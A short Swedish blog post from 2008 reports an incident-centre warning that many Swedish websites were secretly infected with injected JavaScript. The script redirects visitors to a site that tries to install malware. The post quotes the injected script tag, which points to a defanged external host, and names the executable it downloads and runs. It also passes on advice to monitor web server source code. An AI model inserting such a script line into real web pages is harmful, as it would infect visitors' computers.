Svenska hemsidor infekterade i smyg

Svenska hemsidor infekterade i smyg

08-04-25 | av Magnus Brahn [mail] | Kategorier: Internet

De senaste veckorna har ett stort antal svenska hemsidor blivit infekterade med skadlig kod. Ett litet java-script har lagt till i källkoden på hemsidorna som i tysthet skickar besökaren vidare till en hemsida där skadlig kod försöker installeras på besökarens dator. Allt sker i bakgrunden så användaren ser inte att detta sker.

Detta skriver SITIC (Sveriges IT-incidentcentrum) på sin hemsida.

Koden som läggs till på hemsidan är: <script src=hxxp://www.nihaorr1.com/1.js>.

Vid lyckad exploatering laddas hxxp://www.nihaorr1.com/test.exe ned och exekveras.

Sitic rekommenderar att man kontinuerligt verifierar att källkoden på ens webbserver inte modifierats.

Genom en sökning på Google kan man få svar på hemsidor som är eller har varit infekterade.

Läs även andra bloggares åsikter om , , .

Kommentarer, Pingbacker:

Inga Kommentarer/Pingbacker på denna post ännu...

Kommentera:

Din e-post-adress kommer inte att visas på denna webbplats.
Din URL kommer att visas.

Tillåtna XHTML-taggar: <p, ul, ol, li, dl, dt, dd, address, blockquote, ins, del, span, bdo, br, em, strong, dfn, code, samp, kdb, var, cite, abbr, acronym, q, sub, sup, tt, i, b, big, small>
(Radbrytningar blir <br>)
((Sätt kaka för namn, email och URL))
(Tillåt användare att kontakta dig genom ett medelande formulär (din epost kommer INTE visas))

Fajaf Blog

En blog som berättar sanningen, vare sig du vill höra den eller inte.

Oktober 2008
Mån Tis Ons Tor Fre Lör Sön
 << <   > >>
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

Diverse

XML Flöden

Vad är RSS?

powered by b2evolution free blog software